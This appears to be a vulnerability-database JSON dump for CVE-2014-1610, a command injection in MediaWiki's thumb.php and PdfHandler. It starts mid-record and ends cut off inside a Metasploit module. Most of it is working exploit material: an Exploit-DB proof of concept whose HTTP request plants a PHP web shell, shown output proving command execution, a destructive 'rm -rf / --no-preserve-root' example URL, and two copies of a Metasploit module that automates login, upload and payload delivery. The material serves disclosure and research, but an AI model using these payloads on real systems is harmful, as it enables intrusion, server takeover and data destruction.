/mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C\nphp%20system(\\\\$_GET[1]);%22%3Eimages/longcat.php`\nHTTP/1.1\nHost: 127.0.0.1\nConnection: keep-alive\nAccept:\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Encoding: gzip,deflate,sdch\nAccept-Language: en-US,en;q=0.8\nCookie: my_wikiUserID=2; my_wikiUserName=Longcat;\nmy_wiki_session=op3h2huvddnmg7gji0pscfsg02\n\n<html><head><title>Error generating thumbnail</title></head>\n<body>\n<h1>Error generating thumbnail</h1>\n<p>\n\u0e40\u0e01\u0e34\u0e14\u0e1b\u0e31\u0e0d\u0e2b\u0e32\u0e44\u0e21\u0e48\u0e2a\u0e32\u0e21\u0e32\u0e23\u0e16\u0e17\u0e33\u0e23\u0e39\u0e1b\u0e22\u0e48\u0e2d\u0e44\u0e14\u0e49: /bin/bash: -: command not found<br />\nconvert: option requires an argument `-resize' @\nerror/convert.c/ConvertImageCommand/2380.<br />\nGPL Ghostscript 9.10: Unrecoverable error, exit code 1<br />\n\n</p>\n\n</body>\n</html>\n\n\nGET /mediawiki1221/images/longcat.php?1=id HTTP/1.1\nHost: 127.0.0.1\nConnection: keep-alive\nAccept:\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Encoding: gzip,deflate,sdch\nAccept-Language: en-US,en;q=0.8\nCookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2;\nmy_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1\n\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n\n\n# Back-end $cmd\n####################################################################\nGlobalFunctions.php : wfShellExec()\ncmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150\n-dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' |\n'/usr/bin/convert' -depth 8 -resize 10|`echo \"<?php\nsystem(\\\\$_GET[1]);\">images/longcat.php` -\n'/tmp/transform_0e377aad0e27-1.jpg') 2>&1\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.14 (GNU/Linux)\n\niQIcBAEBAgAGBQJS7SLLAAoJEB2kHapd1XMU8BcP/A+hMUw/EDwChN+2XjtExVGU\nBzPrpXXBbp6WGWkeztmrT78Y1b1lXX/cQA4V9IGrdHUEdgG0p3y476d7eZ5sPxVf\nny9Xg7o4WtMgmSvSOOc+lCsy9aAKab801cs1HLbwZokwK8ItwQQoGfik0BgNQ4l1\nmijELis1z1f3k6yJ9/OJicnIJDmHIzPL9wQyr2A5c+jjz74SR//SlQPrqDbvEpj2\nuCCpTpjf6LGYCzyGmqROlf+OxFTeXdB9oghButrEtQ9w6qGQg1/UZjmbx/xLkCqb\nGO1R4qs0PuV4uepwcbLzDDWW5kPejPjcwpuyjrpQO45OcIUtkvzR4iypCxxkvktv\nn2l09Dtn9HqbK3QXhTb2u3uhM9RyJd7kFKhfmZ85OnvMmYvaXSeDWs7Wd9GEO5wh\nFXbhL9O2u/bqiabQKnsJ6bx8hcm2a9mO+/yJZUyBXybHrjseRD4LQFWUYR/WPAQt\nvuICIQyO5pcjkIib+0DN4e7xcFMYuo3o6WkSZuZT+l0LwYDVmhUbaGAEP13+dWZZ\nM0HGoI7AITsqukYFH1n7NYjJazF3Bckc0iJbCrI39TYkvr3V9bRWSEfVBM6FcBan\nkumwDlzYP/301fsKGLtfsnUmK2qkj1EF3DVoJbZ5VFdgiUSlCMsbp9qdGfUPbelR\n2LmeyQR2rzjBB7Sovvcn\n=ooEs\n-----END PGP SIGNATURE-----", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T14:23:33", "description": "MediaWiki 1.22.1 PdfHandler - Remote Code Execution Exploit. CVE-2014-1610. Webapps exploits for multiple platform", "published": "2014-02-01T00:00:00", "type": "exploitdb", "title": "MediaWiki 1.22.1 PdfHandler - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1610"], "modified": "2014-02-01T00:00:00", "id": "EDB-ID:31329", "href": "https://www.exploit-db.com/exploits/31329/", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n####################################################################\r\n#\r\n# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)\r\n# Reported by Netanel Rubin - Check Point\u2019s Vulnerability Research Group (Jan 19, 2014)\r\n# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)\r\n# Affected website : Wikipedia.org and more !\r\n#\r\n# Exploit author : Xelenonz & @u0x (Pichaya Morimoto)\r\n# Release dates : Feb 1, 2014\r\n# Special Thanks to 2600 Thailand !\r\n#\r\n####################################################################\r\n\r\n# Exploit:\r\n####################################################################\r\n1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)\r\nhttp://vulnerable-site/index.php/Special:Upload\r\n2. inject os cmd to upload a php-backdoor\r\nhttp://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20\r\n\"<?php%20system(\\\\$_GET[1]);\">images/xnz.php`\r\n3. access to php-backdoor!\r\nhttp://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root\r\n4. happy pwning!!\r\n\r\n\r\n# Related files:\r\n####################################################################\r\nthumb.php <-- extract all _GET array to params\r\n/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width\r\noptions\r\n/includes/media/ImageHandler.php\r\n/includes/GlobalFunctions.php\r\n/includes/filerepo/file/File.php\r\n\r\n# Vulnerability Analysis:\r\n####################################################################\r\n1. thumb.php\r\nThis script used to resize images if it is configured to be done\r\nwhen the web browser requests the image\r\n<? ...\r\n1.1 Called directly, use $_GET params\r\nwfThumbHandleRequest();\r\n1.2 Handle a thumbnail request via query parameters\r\nfunction wfThumbHandleRequest() {\r\n$params = get_magic_quotes_gpc()\r\n? array_map( 'stripslashes', $_GET )\r\n: $_GET; << WTF\r\n\r\nwfStreamThumb( $params ); // stream the thumbnail\r\n}\r\n1.3 Stream a thumbnail specified by parameters\r\nfunction wfStreamThumb( array $params ) {\r\n...\r\n$fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts\r\nuploaded.pdf file here\r\n...\r\n// Backwards compatibility parameters\r\nif ( isset( $params['w'] ) ) {\r\n$params['width'] = $params['w']; // << Inject os cmd here!\r\nunset( $params['w'] );\r\n}\r\n...\r\n$img = wfLocalFile( $fileName );\r\n...\r\n// Thumbnail isn't already there, so create the new thumbnail...\r\n$thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image\r\nby width/height\r\n...\r\n// Stream the file if there were no errors\r\n$thumb->streamFile( $headers );\r\n...\r\n?>\r\n2. /includes/filerepo/file/File.php\r\n<? ...\r\nfunction transform( $params, $flags = 0 ) { ...\r\n$handler = $this->getHandler(); // << PDF Handler\r\n...\r\n$normalisedParams = $params;\r\n$handler->normaliseParams( $this, $normalisedParams );\r\n...\r\n$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );\r\n..\r\n?>\r\n3. /extensions/PdfHandler/PdfHandler_body.php\r\n<? ...\r\nfunction doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) {\r\n...\r\n$width = $params['width'];\r\n...\r\n$cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd &\r\nparameters\r\n$cmd .= \" -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page}\r\n-dLastPage={$page}\";\r\n$cmd .= \" -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q \". wfEscapeShellArg(\r\n$srcPath );\r\n$cmd .= \" | \" . wfEscapeShellArg( $wgPdfPostProcessor );\r\n$cmd .= \" -depth 8 -resize {$width} - \"; // << FAILED to escape shell\r\nargument\r\n$cmd .= wfEscapeShellArg( $dstPath ) . \")\";\r\n$cmd .= \" 2>&1\";\r\n...\r\n$err = wfShellExec( $cmd, $retval );\r\n...\r\n?>\r\n4. /includes/GlobalFunctions.php\r\nExecute a shell command, with time and memory limits\r\n<? ...\r\nfunction wfShellExec( $cmd, &$retval = null, $environ = array(), $limits =\r\narray() ) {\r\n...\r\npassthru( $cmd, $retval ); // << Execute here!!\r\n\r\n# Proof-Of-Concept\r\n####################################################################\r\nGET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C\r\nphp%20system(\\\\$_GET[1]);%22%3Eimages/longcat.php`\r\nHTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiUserID=2; my_wikiUserName=Longcat;\r\nmy_wiki_session=op3h2huvddnmg7gji0pscfsg02\r\n\r\n<html><head><title>Error generating thumbnail</title></head>\r\n<body>\r\n<h1>Error generating thumbnail</h1>\r\n<p>\r\n\u0e40\u0e01\u0e34\u0e14\u0e1b\u0e31\u0e0d\u0e2b\u0e32\u0e44\u0e21\u0e48\u0e2a\u0e32\u0e21\u0e32\u0e23\u0e16\u0e17\u0e33\u0e23\u0e39\u0e1b\u0e22\u0e48\u0e2d\u0e44\u0e14\u0e49: /bin/bash: -: command not found<br />\r\nconvert: option requires an argument `-resize' @\r\nerror/convert.c/ConvertImageCommand/2380.<br />\r\nGPL Ghostscript 9.10: Unrecoverable error, exit code 1<br />\r\n\r\n</p>\r\n\r\n</body>\r\n</html>\r\n\r\n\r\nGET /mediawiki1221/images/longcat.php?1=id HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2;\r\nmy_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1\r\n\r\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n\r\n\r\n# Back-end $cmd\r\n####################################################################\r\nGlobalFunctions.php : wfShellExec()\r\ncmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150\r\n-dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' |\r\n'/usr/bin/convert' -depth 8 -resize 10|`echo \"<?php\r\nsystem(\\\\$_GET[1]);\">images/longcat.php` -\r\n'/tmp/transform_0e377aad0e27-1.jpg') 2>&1\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.14 (GNU/Linux)\r\n\r\niQIcBAEBAgAGBQJS7SLLAAoJEB2kHapd1XMU8BcP/A+hMUw/EDwChN+2XjtExVGU\r\nBzPrpXXBbp6WGWkeztmrT78Y1b1lXX/cQA4V9IGrdHUEdgG0p3y476d7eZ5sPxVf\r\nny9Xg7o4WtMgmSvSOOc+lCsy9aAKab801cs1HLbwZokwK8ItwQQoGfik0BgNQ4l1\r\nmijELis1z1f3k6yJ9/OJicnIJDmHIzPL9wQyr2A5c+jjz74SR//SlQPrqDbvEpj2\r\nuCCpTpjf6LGYCzyGmqROlf+OxFTeXdB9oghButrEtQ9w6qGQg1/UZjmbx/xLkCqb\r\nGO1R4qs0PuV4uepwcbLzDDWW5kPejPjcwpuyjrpQO45OcIUtkvzR4iypCxxkvktv\r\nn2l09Dtn9HqbK3QXhTb2u3uhM9RyJd7kFKhfmZ85OnvMmYvaXSeDWs7Wd9GEO5wh\r\nFXbhL9O2u/bqiabQKnsJ6bx8hcm2a9mO+/yJZUyBXybHrjseRD4LQFWUYR/WPAQt\r\nvuICIQyO5pcjkIib+0DN4e7xcFMYuo3o6WkSZuZT+l0LwYDVmhUbaGAEP13+dWZZ\r\nM0HGoI7AITsqukYFH1n7NYjJazF3Bckc0iJbCrI39TYkvr3V9bRWSEfVBM6FcBan\r\nkumwDlzYP/301fsKGLtfsnUmK2qkj1EF3DVoJbZ5VFdgiUSlCMsbp9qdGfUPbelR\r\n2LmeyQR2rzjBB7Sovvcn\r\n=ooEs\r\n-----END PGP SIGNATURE-----\r\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/31329/"}, {"lastseen": "2016-02-03T15:26:47", "description": "MediaWiki Thumb.php - Remote Command Execution. CVE-2014-1610. Remote exploits for multiple platform", "published": "2014-02-19T00:00:00", "type": "exploitdb", "title": "MediaWiki Thumb.php - Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1610"], "modified": "2014-02-19T00:00:00", "id": "EDB-ID:31767", "href": "https://www.exploit-db.com/exploits/31767/", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MediaWiki Thumb.php Remote Command Execution',\r\n 'Description' => %q{\r\n MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11,\r\n when DjVu or PDF file upload support is enabled, allows remote unauthenticated\r\n users to execute arbitrary commands via shell metacharacters. If no target file\r\n is specified this module will attempt to log in with the provided credentials to\r\n upload a file (.DjVu) to use for exploitation.\r\n },\r\n 'Author' =>\r\n [\r\n 'Netanel Rubin', # from Check Point - Discovery\r\n 'Brandon Perry', # Metasploit Module\r\n 'Ben Harris', # Metasploit Module\r\n 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-1610' ],\r\n [ 'OSVDB', '102630'],\r\n [ 'URL', 'http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html' ],\r\n [ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=60339' ]\r\n ],\r\n 'Privileged' => false,\r\n 'Targets' =>\r\n [\r\n [ 'Automatic PHP-CLI',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\r\\n\",\r\n 'PrependEncoder' => \"php -r \\\"\",\r\n 'AppendEncoder' => \"\\\"\"\r\n },\r\n 'Platform' => ['php'],\r\n 'Arch' => ARCH_PHP\r\n }\r\n ],\r\n [ 'Linux CMD',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\",\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl python php',\r\n }\r\n },\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD\r\n }\r\n ],\r\n [ 'Windows CMD',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\",\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl',\r\n }\r\n },\r\n 'Platform' => ['win'],\r\n 'Arch' => ARCH_CMD\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Jan 28 2014'))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"Base MediaWiki path\", '/mediawiki' ]),\r\n OptString.new('FILENAME', [ false, \"Target DjVu/PDF file (e.g target.djvu target.pdf)\", nil ]),\r\n OptString.new('USERNAME', [ false, \"Username to authenticate with\", '' ]),\r\n OptString.new('PASSWORD', [ false, \"Password to authenticate with\", '' ])\r\n ], self.class)\r\n end\r\n\r\n def get_version(body)\r\n meta_generator = get_html_value(body, 'meta', 'generator', 'content')\r\n\r\n unless meta_generator\r\n vprint_status(\"No META Generator tag on #{full_uri}.\")\r\n return nil, nil, nil\r\n end\r\n\r\n if meta_generator && meta_generator =~ /mediawiki/i\r\n vprint_status(\"#{meta_generator} detected.\")\r\n meta_generator =~ /(\\d)\\.(\\d+)[\\.A-z]+(\\d+)/\r\n major = $1.to_i\r\n minor = $2.to_i\r\n patch = $3.to_i\r\n vprint_status(\"Major:#{major} Minor:#{minor} Patch:#{patch}\")\r\n\r\n return major, minor, patch\r\n end\r\n\r\n return nil, nil, nil\r\n end\r\n\r\n def check\r\n uri = target_uri.path\r\n\r\n opts = { 'uri' => normalize_uri(uri, 'index.php') }\r\n\r\n response = send_request_cgi!(opts)\r\n\r\n if opts['redirect_uri']\r\n vprint_status(\"Redirected to #{opts['redirect_uri']}.\")\r\n end\r\n\r\n unless response\r\n vprint_status(\"No response from #{full_uri}.\")\r\n return CheckCode::Unknown\r\n end\r\n\r\n # Mediawiki will give a 404 for unknown pages but still have a body\r\n if response.code == 200 || response.code == 404\r\n vprint_status(\"#{response.code} response received...\")\r\n\r\n major, minor, patch = get_version(response.body)\r\n\r\n unless major\r\n return CheckCode::Unknown\r\n end\r\n\r\n if major == 1 && (minor < 8 || minor > 22)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 22 && patch > 1)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 21 && patch > 4)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 19 && patch > 10)\r\n return CheckCode::Safe\r\n elsif major == 1\r\n return CheckCode::Appears\r\n else\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n vprint_status(\"Received response code #{response.code} from #{full_uri}\")\r\n CheckCode::Unknown\r\n end\r\n\r\n def exploit\r\n uri = target_uri.path\r\n\r\n print_status(\"Grabbing version and login CSRF token...\")\r\n response = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'vars_get' => { 'title' => 'Special:UserLogin' }\r\n })\r\n\r\n unless response\r\n fail_with(Failure::NotFound, \"Failed to retrieve webpage.\")\r\n end\r\n\r\n server = response['Server']\r\n if server && target.name =~ /automatic/i && server =~ /win32/i\r\n vprint_status(\"Windows platform detected: #{server}.\")\r\n my_platform = Msf::Module::Platform::Windows\r\n elsif server && target.name =~ /automatic/i\r\n vprint_status(\"Nix platform detected: #{server}.\")\r\n my_platform = Msf::Module::Platform::Unix\r\n else\r\n my_platform = target.platform.platforms.first\r\n end\r\n\r\n # If we have already identified a DjVu/PDF file on the server trigger\r\n # the exploit\r\n unless datastore['FILENAME'].blank?\r\n payload_request(uri, datastore['FILENAME'], my_platform)\r\n return\r\n end\r\n\r\n username = datastore['USERNAME']\r\n password = datastore['PASSWORD']\r\n\r\n major, minor, patch = get_version(response.body)\r\n\r\n # Upload CSRF added in v1.18.2\r\n # http://www.mediawiki.org/wiki/Release_notes/1.18#Changes_since_1.18.1\r\n if ((major == 1) && (minor == 18) && (patch == 0 || patch == 1))\r\n upload_csrf = false\r\n elsif ((major == 1) && (minor < 18))\r\n upload_csrf = false\r\n else\r\n upload_csrf = true\r\n end\r\n\r\n session_cookie = response.get_cookies\r\n\r\n wp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value')\r\n\r\n if wp_login_token.blank?\r\n fail_with(Failure::UnexpectedReply, \"Couldn't find login token. Is URI set correctly?\")\r\n else\r\n print_good(\"Retrieved login CSRF token.\")\r\n end\r\n\r\n print_status(\"Attempting to login...\")\r\n login = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'method' => 'POST',\r\n 'vars_get' => {\r\n 'title' => 'Special:UserLogin',\r\n 'action' => 'submitlogin',\r\n 'type' => 'login'\r\n },\r\n 'cookie' => session_cookie,\r\n 'vars_post' => {\r\n 'wpName' => username,\r\n 'wpPassword' => password,\r\n 'wpLoginAttempt' => 'Log in',\r\n 'wpLoginToken' => wp_login_token\r\n }\r\n })\r\n\r\n if login and login.code == 302\r\n print_good(\"Log in successful.\")\r\n else\r\n fail_with(Failure::NoAccess, \"Failed to log in.\")\r\n end\r\n\r\n auth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','')\r\n\r\n # Testing v1.15.1 it looks like it has session fixation\r\n # vulnerability so we dont get a new session cookie after\r\n # authenticating. Therefore we need to include our old cookie.\r\n unless auth_cookie.include? 'session='\r\n auth_cookie << session_cookie\r\n end\r\n\r\n print_status(\"Getting upload CSRF token...\") if upload_csrf\r\n upload_file = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\r\n 'cookie' => auth_cookie\r\n })\r\n\r\n unless upload_file and upload_file.code == 200\r\n fail_with(Failure::NotFound, \"Failed to access file upload page.\")\r\n end\r\n\r\n wp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value') if upload_csrf\r\n wp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value')\r\n title = get_html_value(upload_file.body, 'input', 'title', 'value')\r\n\r\n if upload_csrf && wp_edit_token.blank?\r\n fail_with(Failure::UnexpectedReply, \"Couldn't find upload token. Is URI set correctly?\")\r\n elsif upload_csrf\r\n print_good(\"Retrieved upload CSRF token.\")\r\n end\r\n\r\n upload_mime = Rex::MIME::Message.new\r\n\r\n djvu_file = ::File.read(::File.join(Msf::Config.data_directory, \"exploits\", \"cve-2014-1610\", \"metasploit.djvu\"))\r\n file_name = \"#{rand_text_alpha(4)}.djvu\"\r\n\r\n upload_mime.add_part(djvu_file, \"application/octet-stream\", \"binary\", \"form-data; name=\\\"wpUploadFile\\\"; filename=\\\"#{file_name}\\\"\")\r\n upload_mime.add_part(\"#{file_name}\", nil, nil, \"form-data; name=\\\"wpDestFile\\\"\")\r\n upload_mime.add_part(\"#{rand_text_alpha(4)}\", nil, nil, \"form-data; name=\\\"wpUploadDescription\\\"\")\r\n upload_mime.add_part(\"\", nil, nil, \"form-data; name=\\\"wpLicense\\\"\")\r\n upload_mime.add_part(\"1\",nil,nil, \"form-data; name=\\\"wpIgnoreWarning\\\"\")\r\n upload_mime.add_part(wp_edit_token, nil, nil, \"form-data; name=\\\"wpEditToken\\\"\") if upload_csrf\r\n upload_mime.add_part(title, nil, nil, \"form-data; name=\\\"title\\\"\")\r\n upload_mime.add_part(\"1\", nil, nil, \"form-data; name=\\\"wpDestFileWarningAck\\\"\")\r\n upload_mime.add_part(wp_upload, nil, nil, \"form-data; name=\\\"wpUpload\\\"\")\r\n post_data = upload_mime.to_s\r\n\r\n print_status(\"Uploading DjVu file #{file_name}...\")\r\n\r\n upload = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\r\n 'data' => post_data,\r\n 'ctype' => \"multipart/form-data; boundary=#{upload_mime.bound}\",\r\n 'cookie' => auth_cookie\r\n })\r\n\r\n if upload and upload.code == 302 and upload.headers['Location']\r\n location = upload.headers['Location']\r\n print_good(\"File uploaded to #{location}\")\r\n else\r\n if upload.body.include? 'not a permitted file type'\r\n fail_with(Failure::NotVulnerable, \"Wiki is not configured for target files.\")\r\n else\r\n fail_with(Failure::UnexpectedReply, \"Failed to upload file.\")\r\n end\r\n end\r\n\r\n payload_request(uri, file_name, my_platform)\r\n end\r\n\r\n def payload_request(uri, file_name, my_platform)\r\n if my_platform == Msf::Module::Platform::Windows\r\n trigger = \"1)&(#{payload.encoded})&\"\r\n else\r\n trigger = \"1;#{payload.encoded};\"\r\n end\r\n\r\n vars_get = { 'f' => file_name }\r\n if file_name.include? '.pdf'\r\n vars_get['width'] = trigger\r\n elsif file_name.include? '.djvu'\r\n vars_get['width'] = 1\r\n vars_get['p'] = trigger\r\n else\r\n fail_with(Failure::BadConfig, \"Unsupported file extension: #{file_name}\")\r\n end\r\n\r\n print_status(\"Sending payload request...\")\r\n r = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'thumb.php'),\r\n 'vars_get' => vars_get\r\n }, 1)\r\n\r\n if r && r.code == 404 && r.body =~ /not exist/\r\n print_error(\"File: #{file_name} does not exist.\")\r\n elsif r\r\n print_error(\"Received response #{r.code}, exploit probably failed.\")\r\n end\r\n end\r\n\r\n # The order of name, value keeps shifting so regex is painful.\r\n # Cant use nokogiri due to security issues\r\n # Cant use REXML directly as its not strict XHTML\r\n # So we do a filthy mixture of regex and REXML\r\n def get_html_value(html, type, name, value)\r\n return nil unless html\r\n return nil unless type\r\n return nil unless name\r\n return nil unless value\r\n\r\n found = nil\r\n html.each_line do |line|\r\n if line =~ /(<#{type}[^\\/]*name=\"#{name}\".*?\\/>)/i\r\n found = $&\r\n break\r\n end\r\n end\r\n\r\n if found\r\n doc = REXML::Document.new found\r\n return doc.root.attributes[value]\r\n end\r\n\r\n ''\r\n end\r\nend\r\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/31767/"}], "dsquare": [{"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1610"], "description": "MediaWiki contains a flaw that is due to the program failing to properly sanitize input passed via the \"page\" parameter in the thumb.php script. This may allow a remote attack to inject arbitrary shell commands.\n\nVulnerability Type: Remote Command Execution", "modified": "2013-04-02T00:00:00", "published": "2014-05-19T00:00:00", "id": "E-382", "href": "", "type": "dsquare", "title": "MediaWiki thumb.php page Parameter Remote Shell Command Injection", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-10-08T00:35:09", "description": "MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11, when DjVu or PDF file upload support is enabled, allows remote unauthenticated users to execute arbitrary commands via shell metacharacters. If no target file is specified this module will attempt to log in with the provided credentials to upload a file (.DjVu) to use for exploitation.\n", "published": "2014-02-07T20:37:44", "type": "metasploit", "title": "MediaWiki Thumb.php Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1610"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/MEDIAWIKI_THUMB", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MediaWiki Thumb.php Remote Command Execution',\n 'Description' => %q{\n MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11,\n when DjVu or PDF file upload support is enabled, allows remote unauthenticated\n users to execute arbitrary commands via shell metacharacters. If no target file\n is specified this module will attempt to log in with the provided credentials to\n upload a file (.DjVu) to use for exploitation.\n },\n 'Author' =>\n [\n 'Netanel Rubin', # from Check Point - Discovery\n 'Brandon Perry', # Metasploit Module\n 'Ben Harris', # Metasploit Module\n 'Ben Campbell' # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2014-1610' ],\n [ 'OSVDB', '102630'],\n [ 'URL', 'http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html' ],\n [ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=60339' ]\n ],\n 'Privileged' => false,\n 'Targets' =>\n [\n [ 'Automatic PHP-CLI',\n {\n 'Payload' =>\n {\n 'BadChars' => \"\\r\\n\",\n 'PrependEncoder' => \"php -r \\\"\",\n 'AppendEncoder' => \"\\\"\"\n },\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP\n }\n ],\n [ 'Linux CMD',\n {\n 'Payload' =>\n {\n 'BadChars' => \"\",\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl python php',\n }\n },\n 'Platform' => ['unix'],\n 'Arch' => ARCH_CMD\n }\n ],\n [ 'Windows CMD',\n {\n 'Payload' =>\n {\n 'BadChars' => \"\",\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl',\n }\n },\n 'Platform' => ['win'],\n 'Arch' => ARCH_CMD\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2014-01-28'))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"Base MediaWiki path\", '/mediawiki' ]),\n OptString.new('FILENAME', [ false, \"Target DjVu/PDF file (e.g target.djvu target.pdf)\", nil ]),\n OptString.new('USERNAME', [ false, \"Username to authenticate with\", '' ]),\n OptString.new('PASSWORD', [ false, \"Password to authenticate with\", '' ])\n ])\n end\n\n def get_version(body)\n meta_generator = get_html_value(body, 'meta', 'generator', 'content')\n\n unless meta_generator\n vprint_status(\"No META Generator tag on #{full_uri}.\")\n return nil, nil, nil\n end\n\n if meta_generator && meta_generator =~ /mediawiki/i\n vprint_status(\"#{meta_generator} detected.\")\n meta_generator =~ /(\\d)\\.(\\d+)[\\.A-z]+(\\d+)/\n major = $1.to_i\n minor = $2.to_i\n patch = $3.to_i\n vprint_status(\"Major:#{major} Minor:#{minor} Patch:#{patch}\")\n\n return major, minor, patch\n end\n\n return nil, nil, nil\n end\n\n def check\n uri = target_uri.path\n\n opts = { 'uri' => normalize_uri(uri, 'index.php') }\n\n response = send_request_cgi!(opts)\n\n if opts['redirect_uri']\n vprint_status(\"Redirected 